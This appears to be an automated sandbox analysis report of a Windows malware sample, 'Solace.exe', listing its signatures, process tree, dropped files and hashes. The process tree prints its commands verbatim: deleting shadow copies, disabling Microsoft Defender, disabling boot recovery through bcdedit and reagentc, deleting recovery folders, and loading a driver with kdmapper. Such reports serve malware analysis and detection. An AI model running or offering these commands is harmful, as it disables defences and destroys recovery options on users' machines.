Analysis

  • user interaction
    yes
  • max time kernel
    5s
  • max time network
    19s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    03/09/2026, 19:08

General

  • Target
    Solace.exe
  • Size 4.2MB
  • Sample260903-xtjpdsek3s
  • SHA256 1726cb7826ca3687d4e8f20d28cff02a34dbc6500ada6bd62217620603137443
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Modifies Windows Defender notification settings 3 TTPs 6 IoCs
  • UAC bypass 3 TTPs 6 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 24 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables one or more Microsoft Defender components 1 TTPs 6 IoCs

    Uses the Powershell Set-MpPreference cmdlet to disable one or more Microsoft Defender components.

  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 56 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables automatic submission of suspicious files to Microsoft by Windows Defender 1 TTPs 2 IoCs

    Uses the Powershell Set-MpPreference cmdlet to prevent Windows Defender from automatically sending files to Microsoft for analysis.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Executes a command shell one-liner 1 TTPs 25 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Kills process with taskkill 8 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • System policy modification 1 TTPs 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Solace.exe
    "C:\Users\Admin\AppData\Local\Temp\Solace.exe"
    1⤵
    • Modifies Windows Defender notification settings
    • UAC bypass
    • Event Triggered Execution: Image File Execution Options Injection
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:4128
    • C:\Windows\System32\Wbem\wmic.exe
      wmic shadowcopy delete
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4520
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp' -ErrorAction SilentlyContinue"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Local\Temp\Solace.exe' -ErrorAction SilentlyContinue"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionExtension '.exe' -ErrorAction SilentlyContinue"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Disables one or more Microsoft Defender components
      PID:3836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableBlockAtFirstSeen $true"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Disables one or more Microsoft Defender components
      PID:5112
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Disables one or more Microsoft Defender components
      PID:1356
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:3340
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -PUAProtection Disabled"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4144
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -SubmitSamplesConsent 2"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Disables automatic submission of suspicious files to Microsoft by Windows Defender
      PID:4016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -MAPSReporting 0"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4312
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c taskkill /F /IM MsMpEng.exe 2>nul
      2⤵
      • Executes a command shell one-liner
      PID:4196
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM MsMpEng.exe
        3⤵
        • Kills process with taskkill
        PID:4828
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c taskkill /F /IM SecurityHealthService.exe 2>nul
      2⤵
      • Executes a command shell one-liner
      PID:2804
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM SecurityHealthService.exe
        3⤵
        • Kills process with taskkill
        PID:5024
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c taskkill /F /IM NisSrv.exe 2>nul
      2⤵
      • Executes a command shell one-liner
      PID:4692
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM NisSrv.exe
        3⤵
        • Kills process with taskkill
        PID:2388
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c taskkill /F /IM SgrmBroker.exe 2>nul
      2⤵
      • Executes a command shell one-liner
      PID:208
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM SgrmBroker.exe
        3⤵
        • Kills process with taskkill
        PID:408
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c net stop WinDefend /y 2>nul
      2⤵
      • Executes a command shell one-liner
      PID:1868
      • C:\Windows\system32\net.exe
        net stop WinDefend /y
        3⤵
          PID:4200
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop WinDefend /y
            4⤵
              PID:2096
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c sc config WinDefend start= disabled 2>nul
          2⤵
          • Executes a command shell one-liner
          PID:5104
          • C:\Windows\system32\sc.exe
            sc config WinDefend start= disabled
            3⤵
            • Launches sc.exe
            PID:4964
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c reagentc /disable 2>nul
          2⤵
          • Executes a command shell one-liner
          PID:4976
          • C:\Windows\system32\ReAgentc.exe
            reagentc /disable
            3⤵
              PID:4236
          • C:\Windows\SYSTEM32\bcdedit.exe
            bcdedit /set {current} recoveryenabled No
            2⤵
            • Modifies boot configuration data using bcdedit
            PID:1352
          • C:\Windows\SYSTEM32\bcdedit.exe
            bcdedit /set {current} bootstatuspolicy ignoreallfailures
            2⤵
            • Modifies boot configuration data using bcdedit
            PID:1308
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c bcdedit /deletevalue {current} recoverysequence 2>nul
            2⤵
            • Executes a command shell one-liner
            PID:3740
            • C:\Windows\system32\bcdedit.exe
              bcdedit /deletevalue {current} recoverysequence
              3⤵
              • Modifies boot configuration data using bcdedit
              PID:332
          • C:\Windows\SYSTEM32\bcdedit.exe
            bcdedit /set {globalsettings} advancedbootoptions No
            2⤵
            • Modifies boot configuration data using bcdedit
            PID:3172
          • C:\Windows\SYSTEM32\bcdedit.exe
            bcdedit /set {globalsettings} optionsedit No
            2⤵
            • Modifies boot configuration data using bcdedit
            PID:3584
          • C:\Windows\SYSTEM32\bcdedit.exe
            bcdedit /set {bootmgr} timeout 0
            2⤵
            • Modifies boot configuration data using bcdedit
            PID:2888
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c chkntfs /x C: 2>nul
            2⤵
            • Executes a command shell one-liner
            PID:4912
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c takeown /f C:\Recovery /r /d y 2>nul
            2⤵
            • Executes a command shell one-liner
            PID:2744
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c icacls C:\Recovery /grant %username%:F /t 2>nul
            2⤵
            • Executes a command shell one-liner
            PID:4364
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c rd /s /q C:\Recovery 2>nul
            2⤵
            • Executes a command shell one-liner
            PID:2236
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c rd /s /q C:\Windows\System32\Recovery 2>nul
            2⤵
            • Executes a command shell one-liner
            PID:3800
          • C:\Windows\SYSTEM32\icacls.exe
            icacls "C:\Windows\System32\reagentc.exe" /deny Everyone:(X)
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:412
          • C:\Windows\SYSTEM32\icacls.exe
            icacls "C:\Windows\System32\bcdedit.exe" /deny Everyone:(X)
            2⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2388
          • C:\Windows\SYSTEM32\bcdedit.exe
            bcdedit /set {globalsettings} advancedbootoptions No
            2⤵
            • Modifies boot configuration data using bcdedit
            PID:3784
          • C:\Windows\SYSTEM32\bcdedit.exe
            bcdedit /set {globalsettings} optionsedit No
            2⤵
            • Modifies boot configuration data using bcdedit
            PID:3460
          • C:\Windows\SYSTEM32\reagentc.exe
            reagentc /disable
            2⤵
              PID:2432
            • C:\Windows\SYSTEM32\bcdedit.exe
              bcdedit /set {default} recoveryenabled No
              2⤵
              • Modifies boot configuration data using bcdedit
              PID:744
            • C:\Windows\SYSTEM32\bcdedit.exe
              bcdedit /set {default} bootstatuspolicy ignoreallfailures
              2⤵
              • Modifies boot configuration data using bcdedit
              PID:728
            • C:\Windows\SYSTEM32\bcdedit.exe
              bcdedit /set {bootmgr} displaybootmenu No
              2⤵
              • Modifies boot configuration data using bcdedit
              PID:2128
            • C:\Windows\SYSTEM32\bcdedit.exe
              bcdedit /set {current} advancedoptions No
              2⤵
              • Modifies boot configuration data using bcdedit
              PID:2072
            • C:\Windows\SYSTEM32\bcdedit.exe
              bcdedit /deletevalue {current} recoverysequence
              2⤵
              • Modifies boot configuration data using bcdedit
              PID:4880
            • C:\Windows\SYSTEM32\bcdedit.exe
              bcdedit /set {default} recoverysequence {00000000-0000-0000-0000-000000000000}
              2⤵
              • Modifies boot configuration data using bcdedit
              PID:3444
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                3⤵
                  PID:2096
              • C:\Windows\SYSTEM32\bcdedit.exe
                bcdedit /set {default} recoveryenabled No
                2⤵
                • Modifies boot configuration data using bcdedit
                PID:436
              • C:\Users\Admin\AppData\Local\Temp\kdmapper.exe
                "C:\Users\Admin\AppData\Local\Temp\kdmapper.exe" --free "C:\Users\Admin\AppData\Local\Temp\testdriver.sys"
                2⤵
                  PID:3340
              • C:\ProgramData\Microsoft\Windows\WindowsDiagnosticService.exe
                C:\ProgramData\Microsoft\Windows\WindowsDiagnosticService.exe
                1⤵
                • Modifies Windows Defender notification settings
                • UAC bypass
                • Event Triggered Execution: Image File Execution Options Injection
                • Checks computer location settings
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                • System policy modification
                PID:4612
                • C:\Windows\System32\Wbem\wmic.exe
                  wmic shadowcopy delete
                  2⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4692
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows' -ErrorAction SilentlyContinue"
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1964
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionProcess 'C:\ProgramData\Microsoft\Windows\WindowsDiagnosticService.exe' -ErrorAction SilentlyContinue"
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2096
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionExtension '.exe' -ErrorAction SilentlyContinue"
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2436
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Disables one or more Microsoft Defender components
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4964
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Disables one or more Microsoft Defender components
                  PID:800
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Disables one or more Microsoft Defender components
                  PID:1604
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:2280
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Set-MpPreference -PUAProtection Disabled"
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:4324
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    3⤵
                      PID:4404
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -SubmitSamplesConsent 2"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Disables automatic submission of suspicious files to Microsoft by Windows Defender
                    PID:1952
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Set-MpPreference -MAPSReporting 0"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:5076
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c taskkill /F /IM MsMpEng.exe 2>nul
                    2⤵
                    • Executes a command shell one-liner
                    PID:4392
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM MsMpEng.exe
                      3⤵
                      • Kills process with taskkill
                      PID:2844
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c taskkill /F /IM SecurityHealthService.exe 2>nul
                    2⤵
                    • Executes a command shell one-liner
                    PID:2172
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM SecurityHealthService.exe
                      3⤵
                      • Kills process with taskkill
                      PID:5056
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c taskkill /F /IM NisSrv.exe 2>nul
                    2⤵
                    • Executes a command shell one-liner
                    PID:4304
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM NisSrv.exe
                      3⤵
                      • Kills process with taskkill
                      PID:4680
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c taskkill /F /IM SgrmBroker.exe 2>nul
                    2⤵
                    • Executes a command shell one-liner
                    PID:1604
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM SgrmBroker.exe
                      3⤵
                      • Kills process with taskkill
                      PID:1536
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c net stop WinDefend /y 2>nul
                    2⤵
                    • Executes a command shell one-liner
                    PID:976
                    • C:\Windows\system32\net.exe
                      net stop WinDefend /y
                      3⤵
                        PID:3252
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop WinDefend /y
                          4⤵
                            PID:4268
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c sc config WinDefend start= disabled 2>nul
                        2⤵
                        • Executes a command shell one-liner
                        PID:4488
                        • C:\Windows\system32\sc.exe
                          sc config WinDefend start= disabled
                          3⤵
                          • Launches sc.exe
                          PID:3616
                      • C:\Windows\system32\cmd.exe
                        cmd.exe /c reagentc /disable 2>nul
                        2⤵
                        • Executes a command shell one-liner
                        PID:3408
                        • C:\Windows\system32\ReAgentc.exe
                          reagentc /disable
                          3⤵
                            PID:2268
                        • C:\Windows\system32\cmd.exe
                          cmd.exe /c chkntfs /x C: 2>nul
                          2⤵
                          • Executes a command shell one-liner
                          PID:4824
                          • C:\Windows\system32\chkntfs.exe
                            chkntfs /x C:
                            3⤵
                              PID:4076
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /c takeown /f C:\Recovery /r /d y 2>nul
                            2⤵
                            • Executes a command shell one-liner
                            PID:2208
                            • C:\Windows\system32\takeown.exe
                              takeown /f C:\Recovery /r /d y
                              3⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:320
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /c icacls C:\Recovery /grant %username%:F /t 2>nul
                            2⤵
                            • Executes a command shell one-liner
                            PID:212
                            • C:\Windows\system32\icacls.exe
                              icacls C:\Recovery /grant Admin:F /t
                              3⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:116
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /c rd /s /q C:\Recovery 2>nul
                            2⤵
                            • Executes a command shell one-liner
                            PID:4524
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /c rd /s /q C:\Windows\System32\Recovery 2>nul
                            2⤵
                            • Executes a command shell one-liner
                            PID:1080
                          • C:\Windows\system32\bcdedit.exe
                            bcdedit /set {globalsettings} advancedbootoptions No
                            2⤵
                            • Modifies boot configuration data using bcdedit
                            PID:2436
                          • C:\Windows\system32\bcdedit.exe
                            bcdedit /set {globalsettings} optionsedit No
                            2⤵
                            • Modifies boot configuration data using bcdedit
                            PID:1860
                          • C:\Windows\system32\reagentc.exe
                            reagentc /disable
                            2⤵
                              PID:3344
                            • C:\Windows\system32\bcdedit.exe
                              bcdedit /set {default} recoveryenabled No
                              2⤵
                              • Modifies boot configuration data using bcdedit
                              PID:2284
                            • C:\Windows\system32\bcdedit.exe
                              bcdedit /set {default} bootstatuspolicy ignoreallfailures
                              2⤵
                              • Modifies boot configuration data using bcdedit
                              PID:1836
                            • C:\Windows\system32\bcdedit.exe
                              bcdedit /set {bootmgr} displaybootmenu No
                              2⤵
                              • Modifies boot configuration data using bcdedit
                              PID:2904
                            • C:\Windows\system32\bcdedit.exe
                              bcdedit /set {current} advancedoptions No
                              2⤵
                              • Modifies boot configuration data using bcdedit
                              PID:3120
                            • C:\Windows\system32\bcdedit.exe
                              bcdedit /deletevalue {current} recoverysequence
                              2⤵
                              • Modifies boot configuration data using bcdedit
                              PID:4408
                            • C:\Windows\system32\bcdedit.exe
                              bcdedit /set {default} recoverysequence {00000000-0000-0000-0000-000000000000}
                              2⤵
                              • Modifies boot configuration data using bcdedit
                              PID:4396
                            • C:\Windows\system32\bcdedit.exe
                              bcdedit /set {default} recoveryenabled No
                              2⤵
                              • Modifies boot configuration data using bcdedit
                              PID:1724
                            • C:\Users\Admin\AppData\Local\Temp\kdmapper.exe
                              "C:\Users\Admin\AppData\Local\Temp\kdmapper.exe" --free "C:\Users\Admin\AppData\Local\Temp\testdriver.sys"
                              2⤵
                                PID:5060
                            • C:\Windows\system32\LogonUI.exe
                              "LogonUI.exe" /flags:0x4 /state0:0xa3912855 /state1:0x41c64e6d
                              1⤵
                                PID:4344

                              Network

                                    MITRE ATT&CK Enterprise v16

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    WindowsDiagnosticService.exe

                                    • Path C:\ProgramData\Microsoft\Windows\WindowsDiagnosticService.exe
                                    • Size 4.2MB
                                    • SHA256 1726cb7826ca3687d4e8f20d28cff02a34dbc6500ada6bd62217620603137443
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    powershell.exe.log

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                    • Size 2KB
                                    • SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 944B
                                    • SHA256 824689cdd2e2bbe5420afa5703f6956b971627e244ab6183a68dd592410f4a30
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 944B
                                    • SHA256 e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 944B
                                    • SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 944B
                                    • SHA256 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 948B
                                    • SHA256 da3851259b355076f41331c3864fdcd7688b05ca312f6fcdb420f710ed7cfeaa
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 944B
                                    • SHA256 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 948B
                                    • SHA256 5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 944B
                                    • SHA256 a78dca0d470c353064c51dbe58a9bf408c188b65d44636759aace9011f5b482e
                                    • MD5 SHA1 SHA512 TLSH

                                    StartupProfileData-NonInteractive

                                    • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    • Size 944B
                                    • SHA256 c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a
                                    • MD5 SHA1 SHA512 TLSH

                                    __PSScriptPolicyTest_sxugixkz.ah3.ps1

                                    • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sxugixkz.ah3.ps1
                                    • Size 60B
                                    • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                    • MD5 SHA1 SHA512 TLSH

                                    kdmapper.exe

                                    • Path C:\Users\Admin\AppData\Local\Temp\kdmapper.exe
                                    • Size 150KB
                                    • SHA256 02b4c1bb174f45d9e88509cc5187a55c4aadd360155c44413831ef5eb54f5b06
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    ReAgent.log

                                    • Path C:\Windows\Logs\ReAgent\ReAgent.log
                                    • Size 3KB
                                    • SHA256 6e08e99eb4146a17ced6663590459116669e90fa4a291c7bf3670bfaad966fe7
                                    • MD5 SHA1 SHA512 TLSH

                                    ReAgent.log

                                    • Path C:\Windows\Logs\ReAgent\ReAgent.log
                                    • Size 6KB
                                    • SHA256 45813feba410c8ea52284596390574f4f13eaef7b43929ae915a5751c0df6f3d
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    diagerr.xml

                                    • Path C:\Windows\Panther\UnattendGC\diagerr.xml
                                    • Size 11KB
                                    • SHA256 ece65f8c300d778f7b3e5200828321306727fa9ca7658dfcef6f8169ee53654f
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    diagerr.xml

                                    • Path C:\Windows\Panther\UnattendGC\diagerr.xml
                                    • Size 13KB
                                    • SHA256 de7d0546b9346fc93a2dfb916408b6de6a62636b33ef6c9f5c8cedd71000fe21
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    diagwrn.xml

                                    • Path C:\Windows\Panther\UnattendGC\diagwrn.xml
                                    • Size 13KB
                                    • SHA256 0bb0a71885e566e787c96445ff2953e1bf94e31393bd9cad7cb5ffd9adacac16
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    diagwrn.xml

                                    • Path C:\Windows\Panther\UnattendGC\diagwrn.xml
                                    • Size 16KB
                                    • SHA256 b30a35831bf44acf2af1475f04a7b8b45a54871acb83e8fc9d811e82d8eba8cc
                                    • MD5 SHA1 SHA512 SSDEEP TLSH

                                    setuperr.log

                                    • Path C:\Windows\Panther\UnattendGC\setuperr.log
                                    • Size 193B
                                    • SHA256 d790be9dfac7d5780e966e1b20475169ef846f06d9699796705e95f67c969863
                                    • MD5 SHA1 SHA512 TLSH

                                    ReAgent.xml

                                    • Path C:\Windows\System32\Recovery\ReAgent.xml
                                    • Size 1KB
                                    • SHA256 894ee2b19608d10df4bf8b8f5bbcf40ce38c09c1f4c5543b6164f40c04bb270d
                                    • MD5 SHA1 SHA512 TLSH

                                    ReAgent.xml

                                    • Path C:\Windows\system32\Recovery\ReAgent.xml
                                    • Size 1KB
                                    • SHA256 7fb033a59f6f597e0d1829c6ca74ed2ea4326788892946e945c04bb85243f7dc
                                    • MD5 SHA1 SHA512 TLSH

                                    memory/4128-13-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-9-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-257-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-255-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-10-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-37-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-8-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-15-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-12-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-172-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-7-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-1-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4128-11-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4404-17-0x0000017E7BCB0000-0x0000017E7BCC0000-memory.dmp

                                    memory/4404-16-0x0000017E7BCB0000-0x0000017E7BCC0000-memory.dmp

                                    memory/4404-25-0x0000017E7E140000-0x0000017E7E162000-memory.dmp

                                    memory/4612-52-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4612-54-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4612-53-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4612-56-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4612-55-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4612-49-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4612-48-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4612-247-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4612-251-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4612-50-0x0000000140000000-0x000000014031B000-memory.dmp

                                    memory/4612-51-0x0000000140000000-0x000000014031B000-memory.dmp